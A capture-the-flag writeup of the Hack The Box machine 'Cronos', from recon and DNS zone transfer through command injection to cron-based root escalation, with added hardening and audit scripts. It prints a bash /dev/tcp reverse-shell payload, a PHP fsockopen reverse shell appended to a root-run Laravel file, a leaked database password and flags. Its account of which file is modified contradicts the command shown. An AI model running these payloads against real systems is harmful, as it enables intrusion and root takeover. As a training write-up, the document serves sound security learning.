Cronos Writeup
- 241216: Added missing title to block, which was previously omitted due to oversight.
Super easy; can you believe it is rated Medium?
Machine Info
| Machine | Description |
|---|---|
| Name | Cronos |
| OS | Linux |
| Difficulty | Medium |
| Author | ch4p |
Recon
Service Scan
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p- --min-rate 6969 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:02 EST
Nmap scan report for 10.129.239.126
Host is up (0.055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ sudo nmap -p22,53,80 -sCV 10.129.239.126
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 21:04 EST
Nmap scan report for 10.129.239.126
Host is up (0.058s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
| 256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_ 256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Cronos
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.87 seconds
The scan shows three open ports: SSH, DNS and HTTP. DNS being open is worth poking at later.
HTTP - Port 80
Before browsing, check whether the response headers give away the target's domain name.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -sv -o /dev/null 10.129.239.126
* Trying 10.129.239.126:80...
* Connected to 10.129.239.126 (10.129.239.126) port 80
* using HTTP/1.x
> GET / HTTP/1.1
> Host: 10.129.239.126
> User-Agent: curl/8.10.1
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2024 02:10:05 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Fri, 01 Jan 2021 00:29:56 GMT
< ETag: "2caf-5b7cbd6fbb19d"
< Accept-Ranges: bytes
< Content-Length: 11439
< Vary: Accept-Encoding
< Content-Type: text/html
<
{ [11439 bytes data]
* Connection #0 to host 10.129.239.126 left intact
They don't; all we learn is what nmap already told us: the site is served by Apache.
Browsing to the IP shows the default Ubuntu Apache page. That page usually means one of two things: either the site is misconfigured, or we are not using the right route (the right host name), so Apache does not know where to send us.
So let's find the domain name first!
DNS - Port 53
The DNS service was already found during scanning, so try a reverse lookup with dig -x.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig @10.129.239.126 -x 10.129.239.126
; <<>> DiG 9.20.2-1-Debian <<>> @10.129.239.126 -x 10.129.239.126
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17915
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;126.239.129.10.in-addr.arpa. IN PTR
;; ANSWER SECTION:
126.239.129.10.in-addr.arpa. 604800 IN PTR ns1.cronos.htb.
;; AUTHORITY SECTION:
129.10.in-addr.arpa. 604800 IN NS ns1.cronos.htb.
;; ADDITIONAL SECTION:
ns1.cronos.htb. 604800 IN A 10.10.10.13
;; Query time: 56 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (UDP)
;; WHEN: Tue Nov 19 21:24:58 EST 2024
;; MSG SIZE rcvd: 114
The reverse lookup resolves the IP to the domain cronos.htb! Beyond that, we can also try a zone transfer (AXFR)!
What is a zone transfer, and how do you know to try one?
Didn't it look odd that nmap found DNS listening on 53/TCP?
Normal DNS queries are usually served over 53/UDP; here TCP is open for the zone transfer feature, because a UDP message is capped in size and cannot carry the zone data unless it is smaller than 512 bytes.
For details see this explanation of zone transfers and this AXFR example.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ dig axfr @10.129.239.126 cronos.htb
; <<>> DiG 9.20.2-1-Debian <<>> axfr @10.129.239.126 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb. 604800 IN NS ns1.cronos.htb.
cronos.htb. 604800 IN A 10.10.10.13
admin.cronos.htb. 604800 IN A 10.10.10.13
ns1.cronos.htb. 604800 IN A 10.10.10.13
www.cronos.htb. 604800 IN A 10.10.10.13
cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 60 msec
;; SERVER: 10.129.239.126#53(10.129.239.126) (TCP)
;; WHEN: Tue Nov 19 21:17:04 EST 2024
;; XFR size: 7 records (messages 1, bytes 203)
This reveals a subdomain, admin, so add the names to /etc/hosts.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ echo "10.129.239.126 cronos.htb admin.cronos.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.129.239.126 cronos.htb admin.cronos.htb
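The transfer above succeeds because BIND 9.10, the version nmap fingerprinted, allows zone transfers to any client unless `allow-transfer` restricts them. As an added example (not the box's actual configuration), this named.conf fragment refuses transfers by default and permits a single secondary; the secondary's address and the zone file path are placeholders:

```conf
// named.conf fragment (added example; addresses and file paths are placeholders)

// Global default: refuse AXFR/IXFR to everyone unless a zone overrides it.
options {
    allow-transfer { none; };
};

// Zone-level exception: only the designated secondary may pull cronos.htb.
zone "cronos.htb" {
    type master;
    file "/etc/bind/db.cronos.htb";     // placeholder path
    allow-transfer { 10.10.10.14; };    // placeholder secondary address
};
```

After `rndc reload`, the same `dig axfr` query returns `; Transfer failed.`, and BIND logs the refusal as `zone transfer 'cronos.htb/AXFR/IN' denied` in its security category, which makes unexpected AXFR attempts easy to alert on.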
cronos.htb
Browsing to the cronos.htb home page and viewing its source shows that every link points to Laravel. Laravel is a well-known PHP framework, so the backend is presumably PHP.
Other things done at this stage
Nothing interesting.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.11.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://cronos.htb
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.11.0
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404 GET 9l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403 GET 11l 32w -c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 85l 137w 2319c http://cronos.htb/
404 GET 9l 33w 287c http://cronos.htb/Program%20Files
301 GET 9l 28w 306c http://cronos.htb/css => http://cronos.htb/css/
200 GET 9l 1270w 118393c http://cronos.htb/css/app.css
200 GET 0l 0w 0c http://cronos.htb/favicon.ico
200 GET 85l 137w 2319c http://cronos.htb/index.php
301 GET 9l 28w 305c http://cronos.htb/js => http://cronos.htb/js/
200 GET 41l 5569w 284534c http://cronos.htb/js/app.js
200 GET 2l 3w 24c http://cronos.htb/robots.txt
200 GET 23l 59w 914c http://cronos.htb/web.config
[####################] - 10s 4742/4742 0s found:10 errors:0
[####################] - 9s 4735/4735 507/s http://cronos.htb/
[####################] - 1s 4735/4735 9230/s http://cronos.htb/css/ => Directory listing (add --scan-dir-listings to scan)
[####################] - 1s 4735/4735 4735/s http://cronos.htb/js/ => Directory listing (add --scan-dir-listings to scan)
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ curl -s http://cronos.htb/web.config
<configuration>
    <system.webServer>
        <rewrite>
            <rules>
                <rule name="Imported Rule 1" stopProcessing="true">
                    <match url="^(.*)/$" ignoreCase="false" />
                    <conditions>
                        <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
                    </conditions>
                    <action type="Redirect" redirectType="Permanent" url="/{R:1}" />
                </rule>
                <rule name="Imported Rule 2" stopProcessing="true">
                    <match url="^" ignoreCase="false" />
                    <conditions>
                        <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" />
                        <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" />
                    </conditions>
                    <action type="Rewrite" url="index.php" />
                </rule>
            </rules>
        </rewrite>
    </system.webServer>
</configuration>
Broken Access Control
admin.cronos.htb is a login page asking for a username and password. Brute-forcing the password failed, so I ran a directory brute force specifically with the .php extension.
The scan shows that anyone can fetch welcome.php without logging in: note that its 302 to index.php still carries a 439-byte body, so the page content is sent along with the redirect.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ feroxbuster -u http://admin.cronos.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -x php
...
302 GET 0l 0w 0c http://admin.cronos.htb/logout.php => index.php
200 GET 56l 139w 1547c http://admin.cronos.htb/
200 GET 0l 0w 0c http://admin.cronos.htb/config.php
200 GET 56l 139w 1547c http://admin.cronos.htb/index.php
302 GET 20l 38w 439c http://admin.cronos.htb/welcome.php => index.php
302 GET 0l 0w 0c http://admin.cronos.htb/session.php => index.php
404 GET 9l 33w 293c http://admin.cronos.htb/Style%20Library
404 GET 9l 33w 297c http://admin.cronos.htb/Style%20Library.php
404 GET 9l 33w 290c http://admin.cronos.htb/modern%20mom
404 GET 9l 34w 295c http://admin.cronos.htb/neuf%20giga%20photo
404 GET 9l 33w 294c http://admin.cronos.htb/modern%20mom.php
404 GET 9l 34w 299c http://admin.cronos.htb/neuf%20giga%20photo.php
The admin site lacks proper access control: anyone who knows admin.cronos.htb/welcome.php can use its trace and ping functions.
I opened Burp Suite, captured the requests while testing both functions, and found that only ping actually works.
Finding Command Injection
The captured request shows that welcome.php is just a simple form that submits a command.
Both parameters, command=<COMMAND> and host=<IP>, can be changed freely, so I tried injecting a curl back to my machine, and the web server did send the GET request.
Prepare the reverse shell payload:
command=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.10%2f8787%200%3e%261%20%23'&host=8.8.8.8
Command Injection Payload Explained
URL-decoding the payload gives:
bash -c 'bash -i >& /dev/tcp/10.10.14.10/8787 0>&1 #'
It is just a plain reverse shell command, with a trailing # that comments out the host IP the page appends after it.
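The page does not show the source of welcome.php, so the following is an added example, not the box's code. It rebuilds the assumed flaw (the `command` and `host` fields joined into one shell string) in Python rather than PHP, puts a hardened handler next to it (allowlisted action, host validated as an IP literal, argv list with no shell), and adds a small detector that flags request bodies like the one above for log review. The action table, the regex and every function name are my own assumptions; the sample body is the writeup's own payload.

```python
"""Added example (not from the writeup or the Cronos box): the command-injection
pattern behind welcome.php rebuilt in Python, beside a hardened handler and a
detector for request bodies. The vulnerable builder is an assumption about how
welcome.php joins `command` and `host`; its PHP source is not on the page."""
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed: the only two actions the admin page is meant to expose.
# Fixed argv prefixes, so the client never supplies a program name.
ALLOWED_ACTIONS = {
    "ping": ["ping", "-c", "1"],
    "traceroute": ["traceroute", "-m", "10"],
}


def vulnerable_shell_line(command: str, host: str) -> str:
    """Assumed shape of the flaw: both form fields become one shell string.
    Returned, never executed, so the injected line can be inspected safely."""
    return f"{command} {host}"


def hardened_argv(command: str, host: str) -> list[str]:
    """Build an argv list (no shell) from an allowlisted action and a
    validated IP literal. Raises ValueError for anything else."""
    if command not in ALLOWED_ACTIONS:
        raise ValueError(f"unknown action {command!r}")
    try:
        ip = ipaddress.ip_address(host.strip())
    except ValueError:
        raise ValueError(f"host must be an IP literal, got {host!r}") from None
    # str(ip) is the canonical form; no metacharacter survives ip_address().
    return ALLOWED_ACTIONS[command] + [str(ip)]


def is_rejected(command: str, host: str) -> bool:
    """True when the hardened handler refuses the pair (helper for checks)."""
    try:
        hardened_argv(command, host)
    except ValueError:
        return True
    return False


# Indicators a WAF rule or log review can flag in the decoded form body:
# reverse-shell markers plus shell metacharacters (assumed list).
SUSPICIOUS = re.compile(r"/dev/tcp/|bash -i|\bnc\b|\bcurl\b|\bwget\b|[;&|`$<>]")


def flag_form_body(body: str) -> list[str]:
    """URL-decode an x-www-form-urlencoded body and return the field names
    whose value contains shell metacharacters or reverse-shell markers."""
    flagged = []
    for field, values in parse_qs(body, keep_blank_values=True).items():
        if any(SUSPICIOUS.search(v) for v in values):
            flagged.append(field)
    return sorted(flagged)


# Sample input: the request body from the writeup, reused as-is.
SAMPLE_BODY = ("command=bash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f"
               "10.10.14.10%2f8787%200%3e%261%20%23'&host=8.8.8.8")

if __name__ == "__main__":
    params = {k: v[0] for k, v in parse_qs(SAMPLE_BODY).items()}
    print("would reach /bin/sh:", vulnerable_shell_line(params["command"], params["host"]))
    print("flagged fields:", flag_form_body(SAMPLE_BODY))
    print("hardened handler rejects it:", is_rejected(params["command"], params["host"]))
    print("hardened argv for a legitimate request:", hardened_argv("ping", "8.8.8.8"))
```

The hardened version removes the shell entirely rather than trying to escape the input: `ping` receives its argument straight from an argv list, and only a string that `ipaddress.ip_address()` accepts ever gets there. The detector is a coarse first pass for request logs; a single `;` in a hostname field is enough to warrant a look.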
Reverse shell obtained!
Unexpectedly, www-data turns out to have permission to read noulis's home directory.
www-data@cronos:/var/www/admin$ ls
ls
config.php
index.php
logout.php
session.php
welcome.php
www-data@cronos:/var/www/admin$ cat config.php
cat config.php
<?php
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'admin');
define('DB_PASSWORD', 'kEjdbRigfBHUREiNSDs');
define('DB_DATABASE', 'admin');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
?>
www-data@cronos:/var/www/admin$ cd /home
cd /home
www-data@cronos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K May 10 2022 .
drwxr-xr-x 23 root root 4.0K May 10 2022 ..
drwxr-xr-x 4 noulis noulis 4.0K May 10 2022 noulis
www-data@cronos:/home$ ls noulis
ls noulis
user.txt
www-data@cronos:/home$ cat noulis/user.txt
cat noulis/user.txt
e37184fa832a858d65f55f9c0ff03205
Other things done at this stage
Didn't work.
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ ffuf -request-proto http -request login.req -w /usr/share/wordlists/seclists/Passwords/xato-net-10-million-passwords-100000.txt -fs 1585
...
POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://admin.cronos.htb
Connection: keep-alive
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=aoisqv2k4egh3llbkgvqgj13q1
Upgrade-Insecure-Requests: 1
Priority: u=0, i
username=admin&password=FUZZ
Privilege Escalation via Crontab
The box name is a huge hint, and www-data can read /etc/crontab, so how could I not take a look?
www-data@cronos:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
Sure enough, there is something there: root runs Laravel's artisan schedule:run every minute. That means if we can control artisan, or anything artisan pulls in, we can escalate privileges!
www-data@cronos:/$ ls -alh /var/www/laravel/artisan
ls -alh /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1.7K Apr 9 2017 /var/www/laravel/artisan
First check the permissions on /var/www/laravel/artisan: it is readable and writable (owned by www-data), and its content shows that artisan is just a PHP script.
In theory, appending a PHP reverse shell to that file is enough to wait for a root reverse shell to call back.
But the current session is a dumb shell, so I can't edit files interactively with vim, and I want to simply tee -a the code in,
so first let's see which file is suitable for appending code on its last line.
If you want, you can use python to turn the dumb shell into a "smart" one.
artisan requires two files at the very start, autoload.php and app.php, and ends with exit($status),
so appending code to the end of artisan will not work; look at the other two files instead.
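To find this class of misconfiguration before someone else does, here is an added audit script that is not part of the writeup: it parses an /etc/crontab-style file, collects the absolute paths referenced by root's jobs, and reports any regular file that is not owned by root or is group- or world-writable, which is exactly the condition artisan is in here. It is Python rather than anything on the box; the sample crontab is the one shown above, while the fake filesystem table and uid 33 for www-data are constructed so the script runs offline.

```python
"""Added example (not from the writeup): audit a system crontab for root jobs
whose command references a file a non-root user could modify. The sample
crontab is the one from the box; the fake filesystem is constructed."""
import os
import shlex
import stat
from typing import Callable, NamedTuple


class Finding(NamedTuple):
    path: str
    command: str
    reason: str


def parse_system_crontab(text: str) -> list[tuple[str, str]]:
    """Return (user, command) pairs from /etc/crontab-style text, where the
    sixth field is the user. Skips comments, blank lines and VAR=value lines;
    handles @reboot/@daily shorthands (user is then the second field)."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if "=" in first:
            continue  # environment assignment such as SHELL=/bin/sh
        n = 2 if first.startswith("@") else 6
        fields = line.split(None, n)
        if len(fields) < n + 1:
            continue
        jobs.append((fields[n - 1], fields[n]))
    return jobs


def candidate_paths(command: str) -> list[str]:
    """Absolute paths mentioned anywhere in the command line, including
    interpreter arguments such as the artisan script."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = command.split()
    seen = []
    for tok in tokens:
        tok = tok.lstrip("0123456789<>&")  # strip redirection prefixes like 2>/tmp/x
        if tok.startswith("/") and tok not in seen:
            seen.append(tok)
    return seen


def risky_root_cron_targets(crontab_text: str,
                            stat_fn: Callable[[str], object] = os.stat) -> list[Finding]:
    """For every root job, flag referenced regular files that a non-root
    user could alter: not owned by uid 0, or group/world-writable."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in candidate_paths(command):
            try:
                st = stat_fn(path)
            except OSError:
                continue  # path does not exist: nothing to modify
            if not stat.S_ISREG(st.st_mode):
                continue  # directories and devices are out of scope here
            reasons = []
            if st.st_uid != 0:
                reasons.append(f"owned by uid {st.st_uid}, not root")
            if st.st_mode & stat.S_IWGRP:
                reasons.append("group-writable")
            if st.st_mode & stat.S_IWOTH:
                reasons.append("world-writable")
            if reasons:
                findings.append(Finding(path, command, "; ".join(reasons)))
    return findings


# Sample input: the crontab the writeup shows on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
* * * * * root php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""

# Constructed stand-in for the box's filesystem: (uid, mode) per path.
# www-data is uid 33 on Debian/Ubuntu, matching the ls -alh output above.
FAKE_FS = {
    "/usr/sbin/anacron": (0, stat.S_IFREG | 0o755),
    "/etc/cron.hourly": (0, stat.S_IFDIR | 0o755),
    "/etc/cron.daily": (0, stat.S_IFDIR | 0o755),
    "/var/www/laravel/artisan": (33, stat.S_IFREG | 0o755),
}


class _FakeStat(NamedTuple):
    st_uid: int
    st_mode: int


def fake_stat(path: str) -> _FakeStat:
    """os.stat replacement backed by FAKE_FS (constructed)."""
    try:
        uid, mode = FAKE_FS[path]
    except KeyError:
        raise FileNotFoundError(path) from None
    return _FakeStat(uid, mode)


def demo_findings() -> list[Finding]:
    """Run the audit against the sample crontab and the fake filesystem."""
    return risky_root_cron_targets(SAMPLE_CRONTAB, stat_fn=fake_stat)


if __name__ == "__main__":
    for f in demo_findings():
        print(f"{f.path}: {f.reason}\n    in: {f.command}")
```

Against a live host, call `risky_root_cron_targets(open("/etc/crontab").read())` and feed it the files under /etc/cron.d as well. The check is deliberately file-level: a writable parent directory, a writable interpreter earlier in PATH, or files the script itself includes (here bootstrap/app.php and autoload.php) are further routes to root that this pass does not cover, so treat a clean result as a starting point rather than a verdict.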
www-data@cronos:/$ cat /var/www/laravel/artisan
cat /var/www/laravel/artisan
#!/usr/bin/env php
<?php
/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/bootstrap/autoload.php';
$app = require_once __DIR__.'/bootstrap/app.php';
...
$kernel->terminate($input, $status);
exit($status);
www-data@cronos:/var/www/laravel$ cat bootstrap/*.php
cat bootstrap/*.php
<?php
...
$app->singleton(
Illuminate\Contracts\Http\Kernel::class,
App\Http\Kernel::class
);
$app->singleton(
Illuminate\Contracts\Console\Kernel::class,
App\Console\Kernel::class
);
$app->singleton(
Illuminate\Contracts\Debug\ExceptionHandler::class,
App\Exceptions\Handler::class
);
...
return $app;
Not suitable for appending code at the end, because it ends with return.
<?php
define('LARAVEL_START', microtime(true));
/*
|--------------------------------------------------------------------------
| Register The Composer Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader
| for our application. We just need to utilize it! We'll require it
| into the script here so that we do not have to worry about the
| loading of any our classes "manually". Feels great to relax.
|
*/
require __DIR__.'/../vendor/autoload.php';
Finally, append the payload to autoload.php and wait for the callback.
www-data@cronos:/var/www/laravel$ echo '$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");' | tee -a ./bootstrap/app.php
$sock=fsockopen("10.10.14.10",8788);exec("/bin/sh -i <&3 >&3 2>&3");
www-data@cronos:/var/www/laravel$ exit
┌──(kali㉿kali)-[~/…/CTF/HTB/Machines/Cronos]
└─$ nc -lvnp 8788
listening on [any] 8788 ...
connect to [10.10.14.10] from (UNKNOWN) [10.129.239.126] 47986
bash: cannot set terminal process group (10151): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# cat root.txt
cat root.txt
0e2da2d811079c6307c50a835b593f87